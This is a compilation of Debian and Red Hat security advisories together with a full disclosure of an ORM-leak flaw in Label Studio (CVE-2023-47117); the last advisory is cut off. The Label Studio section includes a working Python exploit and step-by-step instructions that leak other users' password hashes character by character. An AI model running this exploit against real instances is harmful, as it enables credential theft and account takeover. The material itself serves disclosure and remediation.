Debian Linux Security Advisory 5548-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5548-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 05, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-17  
CVE ID         : CVE-2023-22025 CVE-2023-22081

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 17.0.9+9-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 17.0.9+9-1~deb12u1.

We recommend that you upgrade your openjdk-17 packages.

For the detailed security status of openjdk-17 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-17

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVH8rMACgkQEMKTtsN8  
Tjahiw/+KV2CipWhe7kpI5GXnMkCH9lOIYYv6S/zSu3RpB/zEH72QoAfJVRPazNy  
6ubJtk1kbrkc/mo6RFRw+0yVuo8czZ2NiVYc7E+pmVdCu1QT+M1BlV6xhN9KntpY  
pw2V+/+toyi0lmMRl13FgMC9loUdBHJO7zHbfNCKZAQHoBt1JK1UChwKDUC+UeGr  
0A/4wk5gMaKLMizr5nSEXsJS1D0cnAeqogIU42G6MdHTQnF1dTtXOtA3VbS+AnAl  
cPea29ALDnpruizp/7pBCu4q9hGvCrKYHxZ5ZIwfS7shfYSN0qqAtqmsw8ZSnAp6  
MlPwbdKfYWFhujvT3prQEtgPqowK+sMjSRHvjZyXIYrYK6/ORduckVpSHN3Ue3V7  
UcFKiZvVrub6YB9nFB0fbHs7FL4N/Eb75n8B5OzaHM1RrH12NNKWw9aghHEMofQB  
Isai5wglPnERZqDOYuUnrwxBfsRKGbRsYl86wYCnDBYSDtO5o6Fdp5daZBtm40dl  
fo4GoM2FVlkIFKR/xLviQ/l+q8bc3jOcT4ZtgiVlYHD5YuunT9pMxOYHHMF4NeP7  
ve+hB46m3GxVgeu50L3e7bOLEDbsMwXbhzN+IvR1IBNuwEvXUWy0jg4GZJQ30u7b  
l10rG4HjAvcL0U/axHmQcaKZWwd9cc9EfbQMUTJ5UzuSN9YcutA=  
=vysv  
-----END PGP SIGNATURE-----

Debian Security Advisory 5548-1

Debian Linux Security Advisory 5546-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5546-1                   security@debian.org  
https://www.debian.org/security/                           Andres Salomon  
November 02, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2023-5480 CVE-2023-5482 CVE-2023-5849 CVE-2023-5850   
                 CVE-2023-5851 CVE-2023-5852 CVE-2023-5853 CVE-2023-5854   
                 CVE-2023-5855 CVE-2023-5856 CVE-2023-5857 CVE-2023-5858   
                 CVE-2023-5859

Multiple security issues were discovered in Chromium, which could result  
in the execution of arbitrary code, denial of service or information  
disclosure.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 119.0.6045.105-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 119.0.6045.105-1~deb12u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmVFF04ACgkQZF0CR8Nu  
djdzWhAAwLgUKUHw7DKsOlj52comEvShKoVSVrMM34ZDpcIizK/MtkQm/d7GsOU2  
D6AV6pI4vjR7mlbFiN9l99VIGF919iFsQdXdrq+49m/YafFVV3Q2EMagvhDRFRoF  
DJLtNml9gaWgvLoN77Uh0HShpoSWpVc9cXq8w+Xq8mpu+c9dkzquigY0Q0VWZqOs  
munuVIouMH7RhhCAiL+uJ67f1rDW49OEFvcFTyGWrdzpAgWP61u9Zq3iC4S9ovZP  
UprMUQt6+1wDH3/Mp020/Ln1XhCXfnlsvjXAmpygegbRttJAHwWPTyfvX0+ZdZ2h  
uLqDcF7EEtox+mZfLdVJZZVJyYugsGO5tqRk8psc77o1eW3BTaOgdSUYoereOm6O  
/47UJvpqQYRSjN52/FTGHAkXJhjOQHi0/BzSwXsi1szeNbAAUUThhSa6tXev0eTN  
xgW5xwP40gHScHEzla4rXnM/uyE/cRwBzyiocMQJi3eOREAyMGxUktruRehCSUS1  
GtUzWmFOlwtMIDPuzfK2ZJE1iv4stkfzcZtwfpHKiCkqY5fmkeSNrhVP8PmsK0bk  
kGW9AHnsLpYJj1MGNuIaGF1AxcWT6n3DrkUU7X/0ETxpA+2EVIrzgkikuq8mFfHe  
iEoBHpVeY3/iF1coGhHLFhSRD1OHECJ7ydU46Ji9fPH9tqcmTb0=  
=/Wn5  
-----END PGP SIGNATURE-----

Debian Security Advisory 5546-1

Debian Linux Security Advisory 5544-1 - Damien Diederen discovered that SASL quorum peer authentication within Zookeeper, a service for maintaining configuration information, was insufficiently enforced in some configurations.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5544-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 31, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : zookeeperCVE ID         : CVE-2023-44981Damien Diederen discovered that SASL quorum peer authentication withinZookeeper, a service for maintaining configuration information, wasinsufficiently enforced in some configurations.For the oldstable distribution (bullseye), this problem has been fixedin version 3.4.13-6+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 3.8.0-11+deb12u1.We recommend that you upgrade your zookeeper packages.For the detailed security status of zookeeper please refer toits security tracker page at:https://security-tracker.debian.org/tracker/zookeeperFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVBUggACgkQEMKTtsN8TjaJAQ//RJ2xwJfLXiLajonTRcY6uhLmMT65GCkzbaVs+WExii/Ip1RWLTh4LScQG/OkOQGEs4OhlxSEBzkQJTSuEvY42AU4aBBSjollcA7HmlXZIJCabuZ69CWWOBJW4Ad57iIi1orRhVjt7Yyd2puZlDeKisnwmPB4kJeYUPGxIWFe8FXnHfrUEUs3xexugjJoMNXQ1xLEjtg8pRCbgDtxZEeuV0Bycbcd/TZj5m8j9UcwXRcA+IX7usHQXYH8fCFTfl+GtWE2/5sOnsVpSK5/u6l2FabvkdswzcehShNAAdamj1i4SCF/p3yGSgw1FoW7Lsz7rPXRBzlo8x4iAa9X4ykqHByowt3H4GwJcOS66E2+7AUhrZFRzTDq0npC9/xQ0orwWwMd1jRBKTWob2H/FMyjcZnRB+eeT1fERTHPQWXAuFkqDzh5YOMevWgx/YP8nfEAAiVWtLiJ45VhUJcjyM9lqoGL9d3YoUVHVmsFu8UI3W0WsM7eQaz18Ql2FQ315O7eFhK2VY7NTwlKgsFdA3pMtR3oYPXgsUHJVhZJHT7wT/ZJsd5CEVSo/wwks14xoVC/vOmhOaUBoPI2wvqzF85tJ1DNhnN3qSq79cLO2e3I4/XJwApAUarELzcOe5J/T7PxF2YyCzmUvdGoOZimzaYMtt+xRIoplqXcrSOJW2X5BGA==f4nP-----END PGP SIGNATURE-----

Debian Security Advisory 5544-1

Red Hat Security Advisory 2023-6886-01 - An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6886.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: plexus-archiver security updateAdvisory ID:        RHSA-2023:6886-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6886Issue date:         2023-11-13Revision:           01CVE Names:          CVE-2023-37460====================================================================Summary: An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.Security Fix(es):* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-37460References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2242288

Red Hat Security Advisory 2023-6886-01

Red Hat Security Advisory 2023-6885-01 - An update for python is now available for Red Hat Enterprise Linux 7. Issues addressed include a bypass vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6885.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python security updateAdvisory ID:        RHSA-2023:6885-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6885Issue date:         2023-11-13Revision:           01CVE Names:          CVE-2023-40217====================================================================Summary: An update for python is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: TLS handshake bypass (CVE-2023-40217)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-40217References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2235789

Red Hat Security Advisory 2023-6885-01

Label Studio is an open source data labeling tool. In all current versions of Label Studio prior to 1.9.2post0, the application allows users to insecurely set filters for filtering tasks. An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. In addition, Label Studio had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes. This vulnerability has been addressed in commit `f931d9d129` which is included in the 1.9.2post0 release. Users are advised to upgrade. There are no known workarounds for this vulnerability.

**Introduction**

This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to 1.9.2post0 and was tested on version 1.8.2.

**Overview**

In all current versions of Label Studio, the application allows users to insecurely set filters for filtering tasks. An attacker can construct a _filter chain_ to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. For an example, the following filter chain will task results by the password hash of an account on Label Studio.

    filter:tasks:updated_by__active_organization__active_users__password
    

For consistency, this type of vulnerability will be termed as **ORM Leak** in the rest of this disclosure.

In addition, Label Studio had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes.

**Description**

The following code snippet from the ViewSetSerializer in label_studio/data_manager/serializers.py insecurely creates Filter objects from a JSON POST request to the /api/dm/views/{viewId} API endpoint.

    @staticmethod
    def \_create\_filters(filter\_group, filters\_data):
        filter\_index \= 0
        for filter\_data in filters\_data:
            filter\_data\["index"\] \= filter\_index
            filter\_group.filters.add(Filter.objects.create(\*\*filter\_data))
            filter\_index += 1

These Filter objects are then applied in the TaskQuerySet in label_studio/data_manager/managers.py.

class TaskQuerySet(models.QuerySet):
    def prepared(self, prepare\_params\=None):
        """ Apply filters, ordering and selected items to queryset
        :param prepare\_params: prepare params with project, filters, orderings, etc
        :return: ordered and filtered queryset
        """
        from projects.models import Project

        queryset \= self

        if prepare\_params is None:
            return queryset

        project \= Project.objects.get(pk\=prepare\_params.project)
        request \= prepare\_params.request
        queryset \= apply\_filters(queryset, prepare\_params.filters, project, request) <1\>
        queryset \= apply\_ordering(queryset, prepare\_params.ordering, project, request, view\_data\=prepare\_params.data)

        if not prepare\_params.selectedItems:
            return queryset

        \# included selected items
        if prepare\_params.selectedItems.all is False and prepare\_params.selectedItems.included:
            queryset \= queryset.filter(id\_\_in\=prepare\_params.selectedItems.included)

        \# excluded selected items
        elif prepare\_params.selectedItems.all is True and prepare\_params.selectedItems.excluded:
            queryset \= queryset.exclude(id\_\_in\=prepare\_params.selectedItems.excluded)

        return queryset

1.  User provided filters are insecurely applied here by calling the apply_filters that constructs the Django ORM filter.

The PreparedTaskManager in label_studio/data_manager/managers.py uses the vulnerable TaskQuerySet for building the Django queryset for querying Task objects, as shown in the following code snippet.

class PreparedTaskManager(models.Manager):
    #...

    def get\_queryset(self, fields\_for\_evaluation\=None, prepare\_params\=None, all\_fields\=False): <1\>
        """
        :param fields\_for\_evaluation: list of annotated fields in task
        :param prepare\_params: filters, ordering, selected items
        :param all\_fields: evaluate all fields for task
        :param request: request for user extraction
        :return: task queryset with annotated fields
        """
        queryset \= self.only\_filtered(prepare\_params\=prepare\_params)
        return self.annotate\_queryset(
            queryset,
            fields\_for\_evaluation\=fields\_for\_evaluation,
            all\_fields\=all\_fields,
            request\=prepare\_params.request
        )

    def only\_filtered(self, prepare\_params\=None):
        request \= prepare\_params.request
        queryset \= TaskQuerySet(self.model).filter(project\=prepare\_params.project) <1\>
        fields\_for\_filter\_ordering \= get\_fields\_for\_filter\_ordering(prepare\_params)
        queryset \= self.annotate\_queryset(queryset, fields\_for\_evaluation\=fields\_for\_filter\_ordering, request\=request)
        return queryset.prepared(prepare\_params\=prepare\_params)

1.  Special Django method for the models.Manager class that is used to retrieve the queryset for querying objects of a model.
2.  Uses the vulnerable TaskQuerySet that was explained above.

The following code snippet of the Task model in label_studio/tasks/models.py shows that the vulnerable PreparedTaskManager is set as a class variable, along with the updated_by relational mapping to a Django user that will be exploited as the entrypoint of the filter chain.

\# ...
class Task(TaskMixin, models.Model):
    """ Business tasks from project
    """
    id \= models.AutoField(auto\_created\=True, primary\_key\=True, serialize\=False, verbose\_name\='ID', db\_index\=True)

    \# ...

    updated\_by \= models.ForeignKey(settings.AUTH\_USER\_MODEL, related\_name\='updated\_tasks',
        on\_delete\=models.SET\_NULL, null\=True, verbose\_name\=\_('updated by'),
        help\_text\='Last annotator or reviewer who updated this task') <1\>

    \# ...

    objects \= TaskManager()  \# task manager by default
    prepared \= PreparedTaskManager()  \# task manager with filters, ordering, etc for data\_manager app <2>

    \# ...

1.  The entry point of the filter chain to filter by the updated_by__active_organization__active_users__password.
2.  The vulnerable PreparedTaskManager being set that will be exploited.

Finally, the TaskListAPI view set in label_studio/tasks/api.py with the /api/tasks API endpoint uses the vulnerable PreparedTaskManager to filter Task objects.

    def get\_queryset(self):
        task\_id \= self.request.parser\_context\['kwargs'\].get('pk')
        task \= generics.get\_object\_or\_404(Task, pk\=task\_id)
        review \= bool\_from\_request(self.request.GET, 'review', False)
        selected \= {"all": False, "included": \[self.kwargs.get("pk")\]}
        if review:
            kwargs \= {
                'fields\_for\_evaluation': \['annotators', 'reviewed'\]
            }
        else:
            kwargs \= {'all\_fields': True}
        project \= self.request.query\_params.get('project') or self.request.data.get('project')
        if not project:
            project \= task.project.id
        return self.prefetch(
            Task.prepared.get\_queryset(
                prepare\_params\=PrepareParams(project\=project, selectedItems\=selected, request\=self.request),
                \*\*kwargs
            )) <1\>

1.  Uses the vulnerable PreparedTaskManager to filter objects.

**Proof of Concept**

Below are the steps to exploit about how to exploit this vulnerability to leak the password hash of an account on Label Studio.

1.  Create two accounts on Label Studio and choose one account to be the victim and the other the hacker account that you will use.
2.  Create a new project or use an existing project, then add a task to the project. Update the task with the hacker account to cause the entry point of the filter chain.
3.  Navigate to the task view for the project and add any filter with the Network inspect tab open on the browser. Look for a PATCH request to /api/dm/views/{view_id}?interaction=filter&project={project_id} and save the view_id and project_id for the next step.
4.  Download the attached proof of concept exploit script named labelstudio_ormleak.py. This script will leak the password hash of the victim account character by character. Run the following command to run the exploit script, replacing the {view_id}, {project_id}, {cookie_str} and {url} with the corresponding values. For further explanation run python3 labelstudio_ormleak.py --help.

python3 labelstudio\_ormleak.py -v {view\_id} -p {project\_id} -c '{cookie\_str}' -u '{url}'

The following example GIF demonstrates exploiting this ORM Leak vulnerability to retrieve the password hash pbkdf2_sha256$260000$KKeew1othBwMKk2QudmEgb$ALiopdBpWMwMDD628xeE1Ie7YSsKxdXdvWfo/PvVXvw=.

**Impact**

This vulnerability can be exploited to completely compromise the confidentiality of highly sensitive account information, such as account password hashes. For all versions <=1.8.1, this finding can also be chained with hard coded SECRET_KEY to forge session tokens of any user on Label Studio and could be abuse to deteriorate the integrity and availability.

**Remediation Advice**

*   Do not use unsanitised values for constructing a filter for querying objects using Django's ORM. Django's ORM allows querying by relation field and performs auto lookups, that enable filtering by sensitive fields.
*   Validate filter values to an allow list before performing any queries.

**Discovered**

*   August 2023, Alex Brown, elttam

**labelstudio_ormleak.py proof of concept**

import argparse
import re
import requests
import string
import sys

\# Password hash characters
CHARS \= string.ascii\_letters + string.digits + '$/+=\_!'
CHARS\_LEN \= len(CHARS)

PAYLOAD \= {
    "data": {
        "columnsDisplayType": {},
        "columnsWidth": {},
        "filters": {
            "conjunction": "and",
            "items": \[
                {
                    "filter": "filter:tasks:updated\_by\_\_active\_organization\_\_active\_users\_\_password", \# ORM Leak filter chain
                    "operator": "regex", \# Use regex operator to filter password hash value
                    "type": "String",
                    "value": "REPLACEME"
                }
            \]
        },
        "gridWidth": 4,
        "hiddenColumns":{"explore":\["tasks:inner\_id"\],"labeling":\["tasks:id","tasks:inner\_id"\]},
        "ordering": \[\],
        "search\_text": None,
        "target": "tasks",
        "title": "Default",
        "type": "list"
    },
    "id": 1, \# View ID
    "project": "1" \# Project ID
}

def parse\_args() \-> argparse.Namespace:
    parser \= argparse.ArgumentParser(
        description\='Leak an accounts password hash by exploiting a ORM Leak vulnerability in Label Studio'
    )

    parser.add\_argument(
        '-v', '--view-id',
        help\='View id of the page',
        type\=int,
        required\=True
    )

    parser.add\_argument(
        '-p', '--project-id',
        help\='Project id to filter tasks for',
        type\=int,
        required\=True
    )

    parser.add\_argument(
        '-c', '--cookie-str',
        help\='Cookie string for authentication',
        required\=True
    )

    parser.add\_argument(
        '-u', '--url',
        help\='Base URL to Label Studio instance',
        required\=True
    )

    return parser.parse\_args()

def setup() \-> dict:
    args \= parse\_args()
    view\_id \= args.view\_id
    project\_id \= args.project\_id
    path\_1 \= "/api/dm/views/{view\_id}?interaction=filter&project={project\_id}".format(
        view\_id\=view\_id,
        project\_id\=project\_id
    )
    path\_2 \= "/api/tasks?page=1&page\_size=1&view={view\_id}&interaction=filter&project={project\_id}".format(
        view\_id\=view\_id,
        project\_id\=project\_id
    )
    PAYLOAD\["id"\] \= view\_id
    PAYLOAD\["project"\] \= str(project\_id)
    
    config\_dict \= {
        'COOKIE\_STR': args.cookie\_str,
        'URL\_PATH\_1': args.url + path\_1,
        'URL\_PATH\_2': args.url + path\_2,
        'PAYLOAD': PAYLOAD
    }
    return config\_dict

def test\_payload(config\_dict: dict, payload) \-> bool:
    sys.stdout.flush()
    cookie\_str \= config\_dict\["COOKIE\_STR"\]
    r\_set \= requests.patch(
        config\_dict\["URL\_PATH\_1"\],
        json\=payload,
        headers\={
            "Cookie": cookie\_str
        }
    )

    r\_listen \= requests.get(
        config\_dict\['URL\_PATH\_2'\],
        headers\={
            "Cookie": cookie\_str
        }
    )

    r\_json \= r\_listen.json()
    return len(r\_json\["tasks"\]) \>= 1

def test\_char(config\_dict, known\_hash, c):
    json\_payload\_suffix \= PAYLOAD
    test\_escaped \= re.escape(known\_hash + c)
    json\_payload\_suffix\["data"\]\["filters"\]\["items"\]\[0\]\["value"\] \=  f"^{test\_escaped}"

    suffix\_result \= test\_payload(config\_dict, json\_payload\_suffix)
    if suffix\_result:
        return (known\_hash + c, c)
    
    return None

def main():
    config\_dict \= setup()
    \# By default Label Studio password hashes start with these characters
    known\_hash \= "pbkdf2\_sha256$260000$"
    print()
    print(f"dumped: {known\_hash}", end\="")
    sys.stdout.flush()

    while True:
        found \= False

        for c in CHARS:
            r \= test\_char(config\_dict, known\_hash, c)
            if not r is None:
                new\_hash, c \= r
                known\_hash \= new\_hash
                print(c, end\="")
                sys.stdout.flush()
                found \= True
                break

        if not found:
            break

    print()

if \_\_name\_\_ \== "\_\_main\_\_":
    main()

CVE-2023-47117: Object Relational Mapper Leak Vulnerability in Filtering Task

Red Hat Security Advisory 2023-6256-01 - Red Hat OpenShift Container Platform release 4.13.21 is now available with updates to packages and images that fix several bugs.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6256.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.13.21 security and extras update  
Advisory ID:        RHSA-2023:6256-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6256  
Issue date:         2023-11-08  
Revision:           01  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.21 is now available with updates to packages and images that fix several bugs.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

There are no RPM packages for this update.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-6256-01

Red Hat Security Advisory 2023-6251-01 - Red Hat OpenShift Virtualization release 4.11.7 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6251.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Virtualization 4.11.7 Images security and bug fix update  
Advisory ID:        RHSA-2023:6251-01  
Product:            OpenShift Virtualization  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6251  
Issue date:         2023-11-01  
Revision:           01  
CVE Names:          CVE-2022-41723  
====================================================================

Summary: 

Red Hat OpenShift Virtualization release 4.11.7 is now available with updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.

This advisory contains OpenShift Virtualization 4.11.7 images.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding (CVE-2022-41723)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* 4.11.7 containers (BZ#2246329)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-41723

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-6251-01

Red Hat Security Advisory 2023-6249-01 - An update for.NET 6.0 is now available for Red Hat Enterprise Linux 7. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6249.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: .NET 6.0 security, bug fix, and enhancement updateAdvisory ID:        RHSA-2023:6249-01Product:            .NET Core on Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6249Issue date:         2023-11-01Revision:           01CVE Names:          CVE-2023-36799====================================================================Summary: An update for .NET  6.0 is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.The CVE-2023-36799 was previously fixed in .NET  6.0 packages in Red Hat Enterprise Linux 7 via erratum RHSA-2023:5142, which updated .NET to SDK 6.0.122 and Runtime 6.0.22. However, the fix was not included in the upstream SDK 6.0.123 and Runtime 6.0.23, which was added to Red Hat Enterprise Linux 7 via erratum RHSA-2023:5705, introducing a security regression. This erratum re-adds the fix for CVE-2023-36799 to .NET 6.0 packages.For more details about the regression, refer to the upstream release notes linked to the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.124 and .NET Runtime 6.0.24.Security Fix(es):* dotnet: Denial of Service with Client Certificates using .NET Kestrel (CVE-2023-36799)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-36799References:https://access.redhat.com/security/updates/classification/#moderatehttps://support.microsoft.com/en-gb/topic/-net-6-0-update-october-24-2023-kb5032874-c7206ee0-8768-496c-a122-eac43b8b85c9https://access.redhat.com/errata/RHSA-2023:5142

Red Hat Security Advisory 2023-6249-01

Red Hat Security Advisory 2023-6248-01 - Red Hat OpenShift Virtualization release 4.12.8 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6248.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: OpenShift Virtualization 4.12.8 Images security updateAdvisory ID:        RHSA-2023:6248-01Product:            OpenShift VirtualizationAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6248Issue date:         2023-11-01Revision:           01CVE Names:          CVE-2022-41723====================================================================Summary: Red Hat OpenShift Virtualization release 4.12.8 is now available with updates to packages and images that fix several bugs and add enhancements.Red Hat Product Security has rated this update as having a security impact of Important. 